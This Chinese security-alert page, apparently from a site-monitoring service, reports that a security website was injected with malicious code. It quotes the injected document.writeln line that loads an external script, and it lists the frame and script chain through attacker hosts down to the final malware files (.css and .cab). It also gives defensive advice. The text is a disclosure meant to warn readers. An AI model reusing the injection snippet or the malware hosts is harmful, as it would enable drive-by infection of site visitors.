注册
登录
| 关键词: htxxp nizhuya 165439 3322 frame org 338 script 8808 cn |
中国信息安全博士网(htxxp://www.secdoctor.cn/)被植入恶意代码。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl:htxxp://www.secdoctor.cn/ 网页被嵌入恶意链接代码: document.writeln(’<script src=htxxp://ufy9g1.chinaw3.com/j/top.js></script>’) 挂马分析: [wide]htxxp://www.secdoctor.cn/ [script]htxxp://www.secdoctor.cn//include/dedeajax2.js [script]htxxp://ufy9g1.chinaw3.com/j/top.js [frame]htxxp://nizhuya.3322.org:338/b165439/b16.htm [frame]htxxp://nizhuya.3322.org:338/b165439/new.html [script]htxxp://nizhuya.3322.org:338/b165439/../xnnn.js [script]htxxp://nizhuya.3322.org:338/b165439/../zhin.js [frame]htxxp://nizhuya.3322.org:338/b165439/../apple4.htm [frame]htxxp://nizhuya.3322.org:338/b165439/fx.htm [frame]htxxp://nizhuya.3322.org:338/b165439/../active.htm [frame]htxxp://nizhuya.3322.org:338/b165439/../cx.htm [frame]htxxp://nizhuya.3322.org:338/b165439/../real10.htm [frame]htxxp://nizhuya.3322.org:338/b165439/../real11.htm [script]htxxp://nizhuya.3322.org:338/b165439/../wewew.js [frame]htxxp://nizhuya.3322.org:338/b165439/new.html [script]htxxp://count7.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计 [script]htxxp://js.tongji.cn.yahoo.com/903009/ystat.js 最终下载病毒文件: htxxp://x9s7b.cn:8808/a/lzz.css htxxp://x9s7b.cn:8808/a/as.css htxxp://x9s7b.cn:8808/a/bf.css htxxp://x9s7b.cn:8808/a/ms.css htxxp://x9s7b.cn:8808/a/re.css htxxp://x9s7b.cn:8808/a/real11.css htxxp://x9s7b.cn:8808/Baidu.cab 通过执行以上病毒文件,来达到完全控制访问者的系统。 该网站历史挂马次数:1 Google对该网站的判定:安全 知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:htxxp://www.cert.org.cn/ 推荐的应对方法: 1.安装客户端保护软件。 2.检查更新windows及第三方软件补丁程序。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
